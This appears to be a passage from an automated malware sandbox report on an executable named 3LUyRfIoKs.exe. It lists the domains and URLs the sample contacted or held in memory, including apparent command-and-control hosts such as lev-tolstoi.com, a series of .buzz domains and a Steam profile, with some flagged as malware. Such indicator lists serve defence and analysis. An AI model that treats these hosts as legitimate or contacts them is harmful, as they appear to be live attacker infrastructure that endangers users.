                  lev-tolstoi.com
                  		104.21.66.86
                  		truefalse
                    		high
                    cashfuzysao.buzz
                    		unknown
                    		unknownfalse
                      		high
                      scentniej.buzz
                      		unknown
                      		unknownfalse
                        		high
                        inherineau.buzz
                        		unknown
                        		unknownfalse
                          		high
                          prisonyfork.buzz
                          		unknown
                          		unknownfalse
                            		high
                            rebuildeso.buzz
                            		unknown
                            		unknownfalse
                              		high
                              appliacnesot.buzz
                              		unknown
                              		unknownfalse
                                		high
                                hummskitnj.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  mindhandru.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    screwamusresz.buzz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          rebuildeso.buzzfalse
                                            		high
                                            appliacnesot.buzzfalse
                                              		high
                                              screwamusresz.buzzfalse
                                                		high
                                                cashfuzysao.buzzfalse
                                                  		high
                                                  inherineau.buzzfalse
                                                    		high
                                                    https://lev-tolstoi.com/apifalse
                                                      		high
                                                      hummskitnj.buzzfalse
                                                        		high
                                                        mindhandru.buzzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtab3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcasts3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://bridge.sfon3LUyRfIoKs.exe, 00000000.00000003.2294656929.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298554589.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/subscriber_agreement/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.fastly.3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://login.s3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.valvesoftware.com/legal.htm3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://store.steampowered3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.google.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af63LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://s.ytimg.com;3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://lev-tolstoi.com/e3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=13LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://lev-tolstoi.com/d3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steam.tv/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://lev-tolstoi.com/ta3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://lev-tolstoi.com/3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2339617530.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl03LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ocsp.rootca1.amazontrust.com0:3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sketchfab.com3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.ecosia.org/newtab/3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://lv.queniujq.cn3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.youtube.com/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/privacy_agreement/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://lev-tolstoi.com:443/apil3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001363000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://bridge.sfo1.ap01.n3LUyRfIoKs.exe, 00000000.00000003.2265413562.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2265583119.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/recaptcha/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://checkout.steampowered.com/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74773LUyRfIoKs.exe, 00000000.00000003.2265413562.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2353231737.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2265583119.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294656929.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298554589.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314592571.0000000005A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.st3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/;3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/about/3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/recr3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://checkout.steampow3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://help.steampowered.com/en/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/market/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/news/3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
